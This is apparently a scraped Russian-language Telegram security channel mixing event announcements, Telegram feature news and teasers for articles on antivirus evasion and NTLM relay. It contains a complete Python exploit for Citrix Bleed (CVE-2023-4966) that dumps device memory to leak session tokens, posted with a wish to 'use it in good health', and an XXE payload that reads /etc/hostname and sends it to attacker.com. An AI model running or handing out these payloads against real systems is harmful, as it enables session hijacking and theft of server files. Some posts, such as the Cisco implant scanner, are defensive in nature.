Forwarded from Standoff 365
🔎 Хотите тоже оказаться в поисковой выдаче Яндекса по запросу «багбаунти»?
Есть простой способ: выступите 24–25 ноября на митапе Standoff Talks, где соберутся элита российского багбаунти и легенды практической безопасности.
🔥 Специально для вас мы решили увеличить количество выступлений и по этому поводу продлеваем call for papers до 27 октября.
Ждем докладов о пентесте и red team, багбаунти, участии в Standoff, онлайн-киберучениях, OSINT или на любую другую интересную тему в сфере практической кибербезопасности.
Все подробности и форма подачи заявки — здесь: https://cfp.standoff365.com/talks/cfp
Есть простой способ: выступите 24–25 ноября на митапе Standoff Talks, где соберутся элита российского багбаунти и легенды практической безопасности.
Ждем докладов о пентесте и red team, багбаунти, участии в Standoff, онлайн-киберучениях, OSINT или на любую другую интересную тему в сфере практической кибербезопасности.
Все подробности и форма подачи заявки — здесь: https://cfp.standoff365.com/talks/cfp
Please open Telegram to view this post
VIEW IN TELEGRAM
🎉7☃1🌚1
Похек
image_2023-10-22_16-04-28.png
76.4 KB
вы уже видели шикарную обнову тг?
❤10👍4🔥2❤🔥1
Forwarded from Код Дурова
В бета-версии 4.10.4 Beta приложения Telegram Desktop у администраторов появилась возможность работать со статистикой каналов и групп.
Добавлены и другие важные нововведения:
— Например, можно быстро менять настройки пересылки по нажатию правой кнопки мыши на панель над полем ввода.
— Теперь есть визуально красивые блоки с кодом с подсветкой синтаксиса, их можно копировать по щелчку на заголовки блоков.
— Блок с моноширинным текстом и с подсветкой кода на выбранном языке программирования можно копировать при помощи синтаксиса ```language.
— Сочетание клавиш Ctrl+Space позволяет открывать меню проверки орфографии.
@d_code
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍1
Forwarded from Just Security
Мало кто знает, но в Awillix люди почти не попадают с улицы или «по объявлению», у всех есть история личного знакомства или его интересных обстоятельств. Так, например, Сережа aka @poxek подошел к нам на форуме после выступления с рядом интересных вопросов по теме.
«Такой молодой, а такой прокаченный парень» — подумали мы. Запомнили. А через время позвали в команду.
Его пример другим наука, как с помощью проактивности и упорства нестись по карьерной лестнице, обгоняя сверстников, получать разные бенефиты и полезные знакомства и успевать вести дюжину собственных проектов. Об этом он и дал интервью, спешите вдохновляться!
«Такой молодой, а такой прокаченный парень» — подумали мы. Запомнили. А через время позвали в команду.
Его пример другим наука, как с помощью проактивности и упорства нестись по карьерной лестнице, обгоняя сверстников, получать разные бенефиты и полезные знакомства и успевать вести дюжину собственных проектов. Об этом он и дал интервью, спешите вдохновляться!
🔥22❤🔥6👍4🥰3❤1🫡1💘1
This media is not supported in your browser
VIEW IN TELEGRAM
#AVbypass #xakep
В этой статье мы с тобой напишем полноценную пермутирующую реализацию техники API Hashing, что позволит раз и навсегда скрыть импорты от глаз антивируса. Впервые технику API Hashing я увидел в вирусе‑шифровальщике Revil, проблема лишь в том, что хеши от функций были вписаны в код, а это позволяет легко создавать сигнатуры. Давай сделаем так, чтобы все данные генерировались на лету, тогда у антивируса не будет шансов!
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡8👍5👀1
This media is not supported in your browser
VIEW IN TELEGRAM
#bloodhound #xakep
Прежде чем применять технику NTLM Relay, необходимо собрать информацию об исследуемом объекте и выбрать первоочередные цели. Но как это сделать, если атакуемая сеть насчитывает многие десятки или сотни узлов? На помощь придет очень полезный и удобный инструмент — BloodHound!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥6
Forwarded from Волосатый бублик
#cisco #cve #webshell #scanner #blueteam
[ Cisco IOS XE Device Scanner for CVE-2023-20198 & CVE-2023-20273 ]
Author: Shadow0ps
https://github.com/Shadow0ps/CVE-2023-20198-Scanner
[ Cisco IOS XE Device Scanner for CVE-2023-20198 & CVE-2023-20273 ]
Webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273.Important! This is not a POC for exploitation. This is a OSINT/Blue Team/Research tool.
Author: Shadow0ps
https://github.com/Shadow0ps/CVE-2023-20198-Scanner
👍5
This media is not supported in your browser
VIEW IN TELEGRAM
Эксплойт для Citrix Bleed: Leaking Session Tokens
CVE-2023-4966
Пользуйтесь на здоровье😉
Exploit:
Использование:
💻 Github
➡️ Исследование
📹 YouTube PoC
🌚 @poxek
CVE-2023-4966
Пользуйтесь на здоровье
Exploit:
#!/usr/bin/env python3
import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()
if args.target is None:
print('Target must be provided (e.g. --target 192.168.1.200)')
sys.exit(0)
hostname = args.target
if __name__ == "__main__":
headers = {
"Host": "a"*24576
}
r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
if r.status_code == 200:
print("--- Dumped Memory ---")
print(r.text[131050:])
print("--- End ---")
else:
print("Could not dump memory")
Использование:
python exploit.py --target TARGET
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤1
Forwarded from Standoff 365
This media is not supported in your browser
VIEW IN TELEGRAM
Все просто: нужно быть матерым спецом по ИБ (уверены, в нашем канале только такие) и оставить заявку на сайте.
А 24–25 ноября встретиться в Кибердоме в рамках Moscow Hacking Week, чтобы прокачать свои скилы в багхантинге и пентесте, да и в целом круто провести время.
Не забудьте рассказать о себе в заявке и поторопитесь — количество мест ограничено.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🆒1
Похек
This media is not supported in your browser
VIEW IN TELEGRAM
Компания Microsoft анонсировала, что в будущем NTLM (New Technology LAN Manager) будет отключен в Windows 11, поскольку компания переходит на альтернативные методы аутентификации и повышения безопасности. Теперь основной упор будет сделан на усиление протокола Kerberos.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥13
Мероприятие для тех, кто хочет попасть в кибербез, но не знает, с чего начать
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤2
Место для общения и обмена опытом профи и энтузиастов ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
This media is not supported in your browser
VIEW IN TELEGRAM
Apple WebKit Arbitrary Code Execution
Затронутые версии: WebKitGTK и WPE WebKit до версии 2.42.1.
Импакт: Обработка веб-контента может привести к выполнению произвольного кода.
Переходите по ссылке, только если вы уверены, что ваше яблочное устройство обновлено до последней версии или у вас Android.
Please open Telegram to view this post
VIEW IN TELEGRAM
😎9⚡2👍2💔2
This media is not supported in your browser
VIEW IN TELEGRAM
Как провести свое первое security-исследование. Колонка Дениса Макрушина
Начало учебного года — это еще и начало сезона подготовки дипломных работ. А это значит, что у меня наступает сезон формулирования тем для студентов факультетов и кафедр информационной безопасности в ведущих вузах. Я собрал свои рекомендации и лайфхаки для подготовки твоего первого ИБ‑исследования.
От себя добавлю, что материал подойдёт всем, кто планирует или уже делает доклад/исследование на какую-то тему, не обязательно ИБ. В статье говориться про сам подход к ресерчам.
Отмечу сайт cfptime.org , где вы сможете отслеживать мировые конференции по ИБ, на которые вы сможете подавать на CFP (Call Of Papers).
А также ict2go для поиска мероприятий по различным направлениям и формату в России.
➡️ Статья на Xakep
🌚 @poxek
Начало учебного года — это еще и начало сезона подготовки дипломных работ. А это значит, что у меня наступает сезон формулирования тем для студентов факультетов и кафедр информационной безопасности в ведущих вузах. Я собрал свои рекомендации и лайфхаки для подготовки твоего первого ИБ‑исследования.
От себя добавлю, что материал подойдёт всем, кто планирует или уже делает доклад/исследование на какую-то тему, не обязательно ИБ. В статье говориться про сам подход к ресерчам.
Отмечу сайт cfptime.org , где вы сможете отслеживать мировые конференции по ИБ, на которые вы сможете подавать на CFP (Call Of Papers).
А также ict2go для поиска мероприятий по различным направлениям и формату в России.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9
Positive Technologies. Разговор об актуальных трендах кибербезопасности
Локация: Музей криптографии
Локация: Музей криптографии
❤21⚡3
Forwarded from #Arm1tage
Обход Out-of-Band XML с получением содержимого файла через Path Traversal
Новости с полей, потели сегодня с челами над одним проектом и пытались раскрутить Error-Based ХХЕ. Проблема:
В итоге вот этот уважаемый господин подсказал необычное решение использовать Path Traversal прямо в DTD коде:
#xxe
Новости с полей, потели сегодня с челами над одним проектом и пытались раскрутить Error-Based ХХЕ. Проблема:
<!ENTITY % file SYSTEM "file:///etc/hostname">Этот классический DTD код для отправки файла на attacker.com не отрабатывал по неизвестным причинам: реквеста на наш сервер небыло а в респонсе при любой модификации ХМЛ сервер выдавал одну и ту же ошибку.
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
В итоге вот этот уважаемый господин подсказал необычное решение использовать Path Traversal прямо в DTD коде:
<!ENTITY % file SYSTEM "file://../../../../../../etc/hostname">И удивительно, но это сработало. В последствии стало ясно, что сервер не отправлял никаких реквестов на attacker.com, потому что не мог по каким-то причинам найти файл, если задать полный путь.
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
#xxe
🔥9👍4
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
Инструменты для поиска проблем в докере 💻
На каждом собеседовании заходит речь про докеры. "Что это?", "Как их использовать?", "Зачем нужны?" и самое главное, — "Как из них выходить?". Есть множество способов, которые можно найти на hacktricks, но сегодня разговор зайдет про инструментарий.
Мне, как нынешнему DevSecOps-у удалось потыкать несколько видов развёртывания инструментов в нем. Я сейчас строю процесс на Gitlab Ci\Cd и у его раннера есть возможность работать как в обычном докере, так и в его "улучшенной" версии.
💻 Docker
Возможен запуск с привилегиями (обычно от этого и отталкиваемся)
💻 Docker in docker
Всегда запущен с привилегиями
💻 Kaniko (dind от Google), buildah, umoci, img
Всегда запущен с привилегиями
🔵 Инструменты Automatic Enumeration/Escape
🌐 deepce — Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE);
🌐 CDK — инструментарий для проникновения в контейнеры с открытым исходным кодом, предназначенный для обеспечения стабильной эксплуатации в различных тонких контейнерах без зависимости от ОС;
🌐 grype — cканер уязвимостей для образов контейнеров и файловых систем;
🌐 LinPEAS — да, у него есть замечательная функция работы с контейнерами;
🌐 dive — инструмент для изучения образа docker, содержимого слоев и поиска способов уменьшения размера образа Docker/OCI.
#opensource #devsecops #blueteam #redteam
На каждом собеседовании заходит речь про докеры. "Что это?", "Как их использовать?", "Зачем нужны?" и самое главное, — "Как из них выходить?". Есть множество способов, которые можно найти на hacktricks, но сегодня разговор зайдет про инструментарий.
Мне, как нынешнему DevSecOps-у удалось потыкать несколько видов развёртывания инструментов в нем. Я сейчас строю процесс на Gitlab Ci\Cd и у его раннера есть возможность работать как в обычном докере, так и в его "улучшенной" версии.
Возможен запуск с привилегиями (обычно от этого и отталкиваемся)
Всегда запущен с привилегиями
Всегда запущен с привилегиями
#opensource #devsecops #blueteam #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10